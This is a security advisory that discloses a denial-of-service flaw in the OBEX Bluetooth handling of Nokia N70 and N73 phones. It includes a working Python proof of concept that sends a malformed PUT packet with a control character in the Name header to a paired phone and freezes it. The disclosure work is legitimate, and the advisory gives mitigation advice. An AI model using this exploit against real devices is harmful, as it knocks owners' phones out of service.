Nokia N70/N73 Bluetooth Stack OBEX Implementation Denial of Service

------------------------------------------------------------------
I. Summary

Nokia N70 and N73 are two popular models from Nokia's N-series lineup of smart phones. A flaw has been found in the OBEX implementation in these two models, which is related to illegal characters in the Name header of a PUT request in an OBEX session. These characters can't be handled properly by the OBEX implementation and will cause denial of service (phone lockup) if exploited successfully.

------------------------------------------------------------------
II. Description

According to the IrOBEX specification, certain path characters (i.e. ':', '/' and '\') are not allowed in the string of the Name header. However, the OBEX implementation in N70/N73, and possibly other models, failed to cope with exceptional conditions to this prescription, and in the case that the Name string consists of one of the following Unicode characters: 

  0x0009 (Tab)
  0x000a (Line feed)
  0x000b (Vertical tab)
  0x000c (Form feed)
  0x000d (Carriage return)
  0x003a (':')
  0x005c ('\')

the bluetooth stack would crash and cause the phone to freeze. It should be noted that in order to exploit this, the attacker will have to pair with victim phone in the first place. This vulnerability can be illustrated by the following python code (require the PyBluez package, tested under Python 2.5.2, PyBluez 0.15 with Microsoft bluetooth stack from Windows XP SP2):

# PoC code to demonstrate the flaw in the OBEX implementation of Nokia phones
# Tested under Windows XP SP2
# Coded by the penetration test team Of NCNIPC (China)

# PyBluez are required to run the code
from bluetooth import *

# Bluetooth address and OBEX channel of the target device
# Replace them with the appropriate values for your device
target = ("00:15:A0:F9:E6:03", 10)

# Make a connection
sock = BluetoothSocket(RFCOMM)
sock.connect(target)

# Connect to the OBEX service
connect_pkg = "\x80\x00\x07\x10\x00\xff\xfe"
sock.send(connect_pkg)
con_recv=sock.recv(20)

if con_recv[0]=='\xa0':
    # Now we are connected

    # The name string that consists of a single 0x0009 character, which will
    # cause the phone to lock up
    name_str = "\x00\x09"
    
    # Construct and send the malformed packet
    name_header = "\x01\x00" + chr(len(name_str) + 5) + name_str + "\x00\x00";
    body_header = "\x49\x00\xa0\x42\x45\x47\x49\x4e\x3a\x56\x43\x41\x52\x44\x0d\x0a\x56\x45\x52\x53\x49\x4f\x4e\x3a\x32\x2e\x31\x0d\x0a\x4e\x3b\x45\x4e\x43\x4f\x44\x49\x4e\x47\x3d\x38\x42\x49\x54\x3b\x43\x48\x41\x52\x53\x45\x54\x3d\x55\x54\x46\x2d\x38\x3a\x42\x6c\x6f\x67\x67\x73\x3b\x4a\x6f\x65\x0d\x0a\x54\x45\x4c\x3b\x50\x52\x45\x46\x3b\x43\x45\x4c\x4c\x3b\x56\x4f\x49\x43\x45\x3a\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x0d\x0a\x54\x45\x4c\x3b\x56\x4f\x49\x43\x45\x3a\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x0d\x0a\x45\x4d\x41\x49\x4c\x3a\x72\x6f\x6f\x74\x40\x65\x78\x61\x6d\x70\x6c\x65\x2e\x63\x6f\x6d\x0d\x0a\x45\x4e\x44\x3a\x56\x43\x41\x52\x44\x0d\x0a"
    put_pkg = "\x82\x00" + chr(len(name_header) + len(body_header) + 3) + name_header + body_header
    print "Packet dump: ", binascii.b2a_hex(put_pkg)
    sock.send(put_pkg)
    print "Packet sent"

    try:
        resp = sock.recv(20)
        print "Response dump: %s" %(binascii.b2a_hex(resp))
    except:
        print "Failed to receive response: ", sys.exc_info()[0]
    
    sock.close()

------------------------------------------------------------------
III. Impact

Denial of service: the phone would freeze and loss responsiveness, the only way to make it function normally is to take out battery, reinstall it and power on the phone.

------------------------------------------------------------------
IV. Affected

Nokia N70 and N73. Other phone models may also be affected due to code reuse.

------------------------------------------------------------------
V. Solution

Don't pair with suspicious bluetooth device. Disable bluetooth if necessary.

------------------------------------------------------------------
VI. Credit

The penetration test team Of NCNIPC (China) is credited for this vulnerability.